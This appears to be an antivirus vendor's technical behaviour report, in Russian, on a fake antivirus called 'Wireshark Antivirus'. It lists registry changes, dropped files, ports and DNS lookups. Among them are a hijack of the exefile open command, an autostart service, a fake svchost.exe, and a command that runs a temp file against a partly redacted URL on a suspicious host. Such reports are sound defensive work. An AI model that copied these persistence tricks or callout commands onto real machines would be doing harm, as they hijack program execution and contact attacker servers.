Техническая информация
- [<HKLM>\SOFTWARE\Classes\exefile\shell\open\command] '' = '%PROGRAM_FILES%\alggui.exe "%1" %*'
- [<HKLM>\SYSTEM\ControlSet001\Services\AdbUpd] 'Start' = '00000002'
- '%TEMP%\win2.tmp' "http://co######.boxingshool.com/stat/action3.cgi?p=###########################################################" "%TEMP%\win1.tmp" 1
- '%PROGRAM_FILES%\svchost.exe'
- '%PROGRAM_FILES%\Wireshark Antivirus\Wireshark Antivirus.exe'
- %PROGRAM_FILES%\adc_w32.dll
- %PROGRAM_FILES%\wp3.dat
- %PROGRAM_FILES%\alggui.exe
- %PROGRAM_FILES%\nuar.old
- %TEMP%\win2.tmp
- %HOMEPATH%\Start Menu\Programs\Wireshark Antivirus\Wireshark Antivirus.lnk
- %PROGRAM_FILES%\Wireshark Antivirus\Wireshark Antivirus.exe
- %HOMEPATH%\Desktop\Wireshark Antivirus.lnk
- %PROGRAM_FILES%\wp4.dat
- %PROGRAM_FILES%\svchost.exe
- 'localhost':1040
- 'localhost':1046
- 'ti##.#indows.com':123
- '25#.#55.255.255':0
- DNS ASK nt##.sp.se
- DNS ASK nt#.##.strath.ac.uk
- DNS ASK to##.#sno.navy.mil
- DNS ASK to##.#tdtime.gov.tw
- DNS ASK ti##.#tdtime.gov.tw
- DNS ASK ti###.stupi.se
- DNS ASK ti##.nist.gov
- DNS ASK ti##.#indows.com
- DNS ASK co######.boxingshool.com
- DNS ASK nt##.#bg.netnod.se
- DNS ASK nt##.#s.wisc.edu
- 'localhost':1038
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'